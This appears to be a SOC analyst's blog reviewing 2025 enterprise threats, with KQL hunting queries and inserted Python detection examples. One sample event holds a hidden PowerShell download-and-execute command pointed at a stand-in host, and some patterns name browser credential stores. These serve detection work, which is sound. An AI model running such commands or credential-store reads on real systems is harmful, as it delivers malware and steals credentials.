Summary of 2025 from a SOC Analyst
Overview
2025 showed clear, practical shifts in what actually hurts enterprises day-to-day: identity and user execution were the paths threat actors favoured. The year wasn’t packed with advanced persistent threat (APT) tradecraft for most enterprise environments. It was about scale: AI-assisted social engineering, commodity malware delivered through trusted platforms, and “make the user do it” execution through ClickFix-style chains that bypass controls.
What stood out most in 2025 was how heavily attackers leaned into trusted surfaces — Microsoft 365, Teams, browser sessions, GitHub/CDN-style hosting, and advertising platforms — while running the same repeatable playbooks at scale: infostealers to harvest credentials and tokens, followed by initial access, then ransomware or business email compromise (BEC). This wasn’t about novel tradecraft; it was about efficiency. Microsoft’s reporting and ENISA’s 2025 threat landscape both reinforce this shift, highlighting the growing scale of social engineering, faster exploitation cycles, and the increasing abuse of legitimate services as core drivers of modern enterprise compromise.
For obvious reasons I cannot be too specific; however, below are the patterns I saw repeatedly across 2025, and why they matter.
1) Infostealers
What changed in 2025
Infostealers aren’t “just password grabbers” anymore; they’re an access factory. Malware-as-a-service (MaaS) ecosystems like Lumma kept showing up with flexible delivery, fast iteration, and reliable theft of browser data and session material that fuels downstream compromise.
How it showed up in enterprise
- Initial access increasingly looked like “valid login + normal tools” because creds/tokens were already stolen.
- Infostealers arrived via malvertising/redirect chains and were often staged on “normal looking” platforms (including developer/hosting ecosystems). Microsoft documented large-scale malvertising leading victims through redirectors and ultimately to payload hosting on platforms like GitHub.
Practical takeaways
Treat session theft as a first-class risk. In practice, conditional access, token protection, and device compliance matter far more than traditional complexity-based password policies. Defenders should prioritise detections that focus on unusual browser credential access patterns, new persistence mechanisms appearing after “user-initiated” installer activity, and outbound connections to fresh or low-reputation infrastructure immediately following a download or ZIP execution.
Tips for hunting in Kusto Query Language (KQL)
- Look for payloads being pulled from the internet
DeviceProcessEvents
| where TimeGenerated >= ago(7d)
| where FileName in~ ("powershell.exe", "mshta.exe", "msbuild.exe", "rundll32.exe")
| where ProcessCommandLine has_any ("http", "https", "Invoke-WebRequest", "curl", "wget")
// Tie each download-capable process to the connections it actually made,
// rather than joining on DeviceId alone (which pairs it with every public connection on the host).
| join kind=inner (
    DeviceNetworkEvents
    | where TimeGenerated >= ago(7d)
    | where RemoteIPType == "Public"
    | where ActionType == "ConnectionSuccess"
    | project DeviceId, InitiatingProcessId, RemoteIP, RemoteUrl, RemotePort
) on DeviceId, $left.ProcessId == $right.InitiatingProcessId
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine, RemoteIP, RemoteUrl, RemotePort
- Look for non-browser processes touching credential stores
DeviceProcessEvents
| where TimeGenerated >= ago(7d)
// Browser credential and cookie store file names appearing on a command line
| where ProcessCommandLine has_any ("Login Data", "Cookies", "Local State", "Web Data")
// Exclude the browsers themselves, whether as the process or as its parent
| where FileName !in~ ("chrome.exe", "msedge.exe", "firefox.exe")
| where InitiatingProcessFileName !in~ ("chrome.exe", "msedge.exe", "firefox.exe")
| project TimeGenerated, DeviceName, InitiatingProcessFileName, FileName, ProcessCommandLine
2) AI-driven phishing
What changed in 2025
The big change wasn’t that AI invented new attack vectors (although that is changing); it lowered the effort to produce high-volume, high-quality lures and impersonation content. Microsoft’s Digital Defense reporting explicitly calls out AI-enabled phishing and fast-evolving multi-stage chains as a key theme. ([Microsoft][1]) ENISA’s 2025 threat landscape also flags AI as a defining element, particularly around social engineering at scale. ([ENISA][4])
Waves of new reports and research are being released on the expected evolution of AI and how it will continue to change and affect the industry.
How it showed up in enterprise
- Better-written pretexts, fewer “obvious scam” tells.
- Faster iteration: lure themes changed weekly, not quarterly.
- More multi-channel delivery (email + messaging + calls), which links directly to the next sections.
Practical takeaways
- Stop relying on “users will spot bad grammar” as a control.
- Harden identity workflows: phishing-resistant MFA where possible, stronger verification for payment/invoice changes, and out-of-band verification procedures that don’t depend on the same compromised channel.
- AI and business email compromise (BEC) are a lethal combination. Users should feel comfortable reporting anything that seems out of place.
Investigation tips:
- Check email context in the business environment
- Does it relate to the recipient user’s role? (IMPORTANT: this does not mean it is benign, but it forms part of your investigation.)
- Pull the email in line with your organisation’s arrangement for viewing emails.
- Look for any signs of spoofing in the email authentication results.
- Analyse links and attachments. (IMPORTANT: links or attachments may not work in sandboxed environments; this is by threat actor design, so don’t assume benign.)
- Look for suspicious redirections or cloned sites that do not line up with the URL field.
- If suspicious, move to the next phase and check whether the user interacted with or downloaded anything.
EmailEvents
| where TimeGenerated >= ago(90d)
| where SenderFromAddress contains "<insert email>"
// Authentication results, delivery outcome and recipients give the context for the checks above
| project TimeGenerated, SenderFromAddress, SenderMailFromAddress, RecipientEmailAddress, Subject, AuthenticationDetails, DeliveryAction, DeliveryLocation, ThreatTypes
// Customise as you see fit; establishing context is important, but again it is not an indication of benign.
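As an added example that is not from the original post, here is a Python triage helper that applies the spoofing checks above (authentication failures, header From versus envelope domain, external mail claiming an internal sender) to constructed EmailEvents-shaped rows; the column names, the JSON layout of AuthenticationDetails and the INTERNAL_DOMAINS set are assumptions.

```python
import json
from email.utils import parseaddr

# Constructed sample rows in the shape of Defender EmailEvents (assumed column names;
# AuthenticationDetails held as a JSON string). Not real mail traffic.
SAMPLE_EMAIL_EVENTS = [
    {"NetworkMessageId": "msg-1",
     "SenderFromAddress": "jane.doe@example-corp.com",
     "SenderMailFromAddress": "bounce@examp1e-corp.com",
     "AuthenticationDetails": '{"SPF":"pass","DKIM":"none","DMARC":"fail","CompAuth":"fail"}'},
    {"NetworkMessageId": "msg-2",
     "SenderFromAddress": "invoices@vendor.example",
     "SenderMailFromAddress": "invoices@vendor.example",
     "AuthenticationDetails": '{"SPF":"pass","DKIM":"pass","DMARC":"pass","CompAuth":"pass"}'},
]
INTERNAL_DOMAINS = {"example-corp.com"}  # constructed: the organisation's own domains
AUTH_CHECKS = ("SPF", "DKIM", "DMARC", "CompAuth")

def domain_of(address):
    return parseaddr(address)[1].rsplit("@", 1)[-1].lower()

def spoofing_signs(event):
    """Return the reasons a message deserves a closer look. An empty list means no sign
    was found, which is context only, not proof that the mail is benign."""
    reasons = []
    auth = json.loads(event.get("AuthenticationDetails") or "{}")
    for check in AUTH_CHECKS:
        result = str(auth.get(check, "none")).lower()
        if result != "pass":
            reasons.append(f"{check}={result}")
    from_dom = domain_of(event["SenderFromAddress"])
    mailfrom_dom = domain_of(event["SenderMailFromAddress"])
    if from_dom != mailfrom_dom:
        reasons.append(f"header From domain {from_dom} differs from envelope domain {mailfrom_dom}")
    if from_dom in INTERNAL_DOMAINS and mailfrom_dom not in INTERNAL_DOMAINS:
        reasons.append("claims an internal sender but was relayed via an external envelope domain")
    return reasons

def triage(events):
    """Map NetworkMessageId -> list of spoofing signs for a batch of events."""
    return {e["NetworkMessageId"]: spoofing_signs(e) for e in events}
```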
TIP: Being a good analyst is about coming to accurate decisions in a reasonable amount of time, and justifying why you have come to a verdict based on the evidence.
3) Impersonation via WhatsApp and social media (trust hijack)
What changed in 2025
Attackers kept moving toward platforms where people respond quickly and which sit out of sight of security monitoring: WhatsApp, SMS, social media DMs, and other encrypted collaboration applications. Even when the exact scam mechanics vary, the consistent pattern is impersonation, urgency, or establishing trust via a high-profile identity such as a CEO.
How it showed up in enterprise
- Finance/HR impersonation attempts outside email.
- “Vendor” or “exec” outreach pushing invoice changes, gift cards, or urgent login steps.
- Staff assuming WhatsApp/DM = “more legitimate” because it feels personal.
- CEO or executive impersonation.
Practical takeaways
- Write (and enforce) a policy: no financial approvals or credential workflows over consumer messaging apps.
- Train staff to treat “new number, urgent request” as a default red flag and to verify via known channels.
4) Helpdesk phishing / identity resets
What changed in 2025
Threat groups kept proving that the helpdesk is a privileged access path. If an attacker can get a password reset or MFA change approved, they don’t need malware.
Australia’s ASD/ACSC guidance on Scattered Spider explicitly calls out social engineering of IT helpdesks to reset passwords/MFA as a core technique. ([cyber.gov.au][6]) CrowdStrike also described Scattered Spider activity expanding targets in 2025 with consistent tradecraft, reinforcing how operationally “standard” helpdesk abuse has become. ([CrowdStrike][7])
How it showed up in enterprise
- MFA resets and enrollment changes followed by rapid access to M365/SSO apps.
- Attackers living inside collaboration platforms after identity takeover (including Teams/communications abuse). Microsoft discussed threats targeting Teams and how attackers leverage password resets/MFA control to operate. ([Microsoft][8])
Practical takeaways
- Lock down helpdesk workflows:
- Require strong identity verification for resets (not KBA).
- Add “cool-off” periods or manager approval for MFA changes on privileged accounts.
- Alert on MFA method changes + new device + new geo sequences.
5) Trojanised installers ads + fake sites leading to stealers/loaders/RATs
What changed in 2025
Fake installers stayed brutally effective because they exploit normal behaviour (“I need this tool now”). The distribution got better: sponsored ads, SEO poisoning, and “looks real enough” landing pages.
Kaspersky described a macOS infostealer campaign using paid search ads and even abuse of shared AI chat links to lure users into running commands that install an infostealer/backdoor. ([me-en.kaspersky.com][9]) This is the same underlying enterprise lesson: users will trust what’s at the top of search results if it looks official.
One example is the fake PuTTY installers. PuTTY is a lightweight Windows tool, commonly used by IT professionals, for making remote command-line connections to other systems. Recent campaigns have exploited this tool’s widespread use in enterprise environments. (Arctic Wolf)
How it showed up in enterprise
- Users downloading “utilities” (PDF tools, archivers, remote tools) from sponsored results.
- Initial foothold becoming infostealer → then remote access tooling or loader deployment.
Practical takeaways
- Restrict execution of new/untrusted installers where possible (application control).
- Browser controls matter: block known bad ad/redirect infrastructure, enforce safe browsing, and monitor for first-time installs from user profile/temp locations.

6) ClickFix (make the user run the payload)
What changed in 2025
ClickFix is one of the most important “enterprise reality” shifts: attackers intentionally add a human step (copy/paste or run a command) to bypass controls that are better at blocking automated droppers.
Microsoft broke down ClickFix as a social engineering technique: lure the user into executing a command, which then kicks off the malware chain. ([Microsoft][10]) Huntress also documented ClickFix campaigns delivering infostealers (including Lumma and others), showing how it ties directly into the credential-theft economy. ([Huntress][11])
How it showed up in enterprise
- Fake error prompts, “verification” pages, fake security messages, fake update flows.
- Clipboard-driven PowerShell execution that looks like “user did it” (because they did).
Practical takeaways
- Train specifically on “never run commands from a webpage / email” (most training is too generic).
- Detection focus: suspicious parent/child chains and command lines around PowerShell/mshta/msbuild/rundll32 triggered shortly after browser activity.
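An added example, not from the original post or from the Microsoft/Huntress write-ups: Python detection logic for the parent/child and timing pattern just described, run over constructed process events with Defender-style field names (assumed). The cue list, the explorer.exe parent case (Win+R paste) and the two-minute window are my own heuristics.

```python
from datetime import datetime, timedelta

BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe", "msbuild.exe", "rundll32.exe", "cmd.exe"}
# Command-line cues typical of a pasted "fix" command: hidden window, encoded or
# download-and-execute payload. Heuristic list; tune it to your environment.
CUES = ("-enc", "-w hidden", "-windowstyle hidden", "iex", "invoke-expression",
        "downloadstring", "invoke-webrequest", "http://", "https://", "curl ", "certutil")
WINDOW = timedelta(minutes=2)   # how recently browser activity must have been seen

# Constructed DeviceProcessEvents-style rows (assumed field names), not real telemetry.
SAMPLE_PROCESS_EVENTS = [
    {"Timestamp": "2025-06-01T09:00:00", "DeviceName": "ws01", "FileName": "msedge.exe",
     "InitiatingProcessFileName": "msedge.exe", "ProcessCommandLine": "msedge.exe --type=renderer"},
    {"Timestamp": "2025-06-01T09:00:40", "DeviceName": "ws01", "FileName": "powershell.exe",
     "InitiatingProcessFileName": "explorer.exe",   # Win+R paste: the parent is the shell
     "ProcessCommandLine": 'powershell.exe -w hidden -c "iex (iwr https://cdn.example.test/v.txt)"'},
    {"Timestamp": "2025-06-01T10:15:00", "DeviceName": "ws02", "FileName": "powershell.exe",
     "InitiatingProcessFileName": "svchost.exe",    # scheduled admin script; should not fire
     "ProcessCommandLine": "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\inventory.ps1"},
]

def _t(s):
    return datetime.fromisoformat(s)

def find_clickfix_chains(process_events):
    """Flag a LOLBin carrying download/execute cues whose parent is a browser, or whose
    parent is explorer.exe with browser activity on the same device within WINDOW
    beforehand. Returns one dict per candidate."""
    events = sorted(process_events, key=lambda e: e["Timestamp"])
    hits = []
    for e in events:
        name, parent = e["FileName"].lower(), e["InitiatingProcessFileName"].lower()
        cmd = e["ProcessCommandLine"].lower()
        cues = [c for c in CUES if c in cmd]
        if name not in LOLBINS or not cues or parent not in BROWSERS | {"explorer.exe"}:
            continue
        t = _t(e["Timestamp"])
        browser_recent = any(
            b["DeviceName"] == e["DeviceName"] and b["FileName"].lower() in BROWSERS
            and timedelta(0) <= t - _t(b["Timestamp"]) <= WINDOW
            for b in events)
        if parent in BROWSERS or browser_recent:
            hits.append({"device": e["DeviceName"], "time": e["Timestamp"],
                         "parent": parent, "process": name, "cues": cues})
    return hits
```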
7) AiTM phishing using site clones / brand impersonation (MFA bypass remains common)
What changed in 2025
AiTM phishing stayed dominant because it beats basic MFA by stealing session cookies/tokens via reverse proxies and realistic clones.
Sekoia’s 2025 analysis highlights the scale and prevalence of AiTM kits (Tycoon 2FA and others) and notes rapid evolution in delivery formats (e.g., shifting attachment/link delivery techniques). ([Sekoia.io Blog][12]) Barracuda also discussed the volume and evolution of phishing-as-a-service and AiTM-style kits in 2025 targeting Microsoft 365. ([Barracuda Blog][13])
How it showed up in enterprise
- Microsoft 365 account takeovers where the login looked legitimate (because it was proxied).
- “New MFA prompt” fatigue exploited to complete the chain.
Practical takeaways
- Push toward phishing-resistant MFA for high-risk users (where feasible).
- Enforce conditional access: impossible travel, device compliance, risk-based sign-in policies.
- Alert on sign-in from new device + token issuance + mailbox rules changes (classic post-phish behaviour).
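The helpdesk-reset sequence in section 4 (MFA method change, then a sign-in from a new device and a new geo) and the post-phish sequence here (new-device sign-in with token issuance, then a mailbox rule change) are both ordered-event correlations over one user. This added Python example, not from the original post, implements a single matcher that serves both, over constructed events with assumed field names and a constructed per-user baseline of known devices and countries.

```python
from datetime import datetime, timedelta

# Constructed identity events with assumed field names (not real tenant logs), plus a
# constructed baseline of the devices/countries each user was seen on before the hunt window.
BASELINE = {"alice": {"devices": {"LAPTOP-A1"}, "countries": {"AU"}},
            "bob": {"devices": {"LAPTOP-B2"}, "countries": {"AU"}}}
SAMPLE_IDENTITY_EVENTS = [
    {"Time": "2025-07-10T08:00:00", "User": "alice", "Type": "SignIn", "Device": "LAPTOP-A1", "Country": "AU"},
    {"Time": "2025-07-10T08:30:00", "User": "alice", "Type": "MfaMethodChanged"},
    {"Time": "2025-07-10T08:42:00", "User": "alice", "Type": "SignIn", "Device": "UNKNOWN-7F", "Country": "NL", "TokenIssued": True},
    {"Time": "2025-07-10T08:50:00", "User": "alice", "Type": "MailboxRuleCreated"},
    {"Time": "2025-07-10T09:00:00", "User": "bob", "Type": "MfaMethodChanged"},  # legitimate phone swap
    {"Time": "2025-07-10T09:05:00", "User": "bob", "Type": "SignIn", "Device": "LAPTOP-B2", "Country": "AU", "TokenIssued": True},
]
WINDOW = timedelta(hours=24)

def new_device_signin(e):
    return e["Type"] == "SignIn" and e.get("Device") not in BASELINE.get(e["User"], {}).get("devices", ())

def new_country_signin(e):
    return e["Type"] == "SignIn" and e.get("Country") not in BASELINE.get(e["User"], {}).get("countries", ())

# Ordered step predicates for the two sequences the text describes.
HELPDESK_RESET = [lambda e: e["Type"] == "MfaMethodChanged",
                  lambda e: new_device_signin(e) and new_country_signin(e)]
AITM_POST_PHISH = [lambda e: new_device_signin(e) and e.get("TokenIssued", False),
                   lambda e: e["Type"] == "MailboxRuleCreated"]

def match_sequence(events, steps, window=WINDOW):
    """Return [(user, matched_events)] wherever one user's events satisfy the ordered step
    predicates, all within `window` of the event that matched the first step."""
    by_user = {}
    for e in sorted(events, key=lambda e: e["Time"]):
        by_user.setdefault(e["User"], []).append(e)
    hits = []
    for user, evs in by_user.items():
        for i, first in enumerate(evs):
            if not steps[0](first):
                continue
            chain, t0 = [first], datetime.fromisoformat(first["Time"])
            for nxt in evs[i + 1:]:
                if datetime.fromisoformat(nxt["Time"]) - t0 > window:
                    break
                if steps[len(chain)](nxt):
                    chain.append(nxt)
                if len(chain) == len(steps):
                    hits.append((user, chain))
                    break
    return hits
```

Bob's legitimate MFA change followed by a sign-in from his known device does not match either sequence, which is the point of keeping a per-user baseline rather than alerting on the MFA change alone.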
Wrap-up: the 2025 pattern in one line
2025 was the year attackers doubled down on identity + user execution while hiding behind trusted platforms and accelerating with AI-assisted scale. This has been my personal experience in my role, across all these various threats. While there are some variations, this has been a consistent theme. I have not included extensions in this blog; however, I am going to go into more detail on malicious extensions in the next blog.
Hopefully this blog has given new or aspiring analysts a firm idea of the threat environment, particularly for the enterprise. By staying up to date on threat intelligence and strategic shifts you will be stronger as a defensive analyst and will move toward proactive security.
References
- Microsoft: Lumma Stealer delivery techniques (May 21, 2025) (Microsoft)
- Microsoft: large-scale malvertising leading to info stealers hosted on platforms like GitHub (Mar 6, 2025) (Microsoft)
- Microsoft: ClickFix social engineering technique (Aug 21, 2025) (Microsoft)
- Huntress: ClickFix delivering infostealers via steganography/image stages (Nov 24, 2025) (Huntress)
- Sekoia: global analysis of AiTM phishing kits & evolving delivery (Jun 11, 2025) (Sekoia.io Blog)
- Barracuda: phishing-as-a-service / AiTM trends in early 2025 (Barracuda Blog)
- cyber.gov.au: Scattered Spider helpdesk/MFA reset social engineering (cyber.gov.au)
- CrowdStrike: Scattered Spider escalation across industries (Jul 2, 2025) (CrowdStrike)
- Microsoft: threats targeting Microsoft Teams and identity takeover flow (Oct 7, 2025) (Microsoft)
- ENISA Threat Landscape 2025 (Oct 7, 2025) (ENISA)
- Kaspersky: paid search ads + AI-chat link abuse delivering AMOS infostealer (Dec 2025) (me-en.kaspersky.com)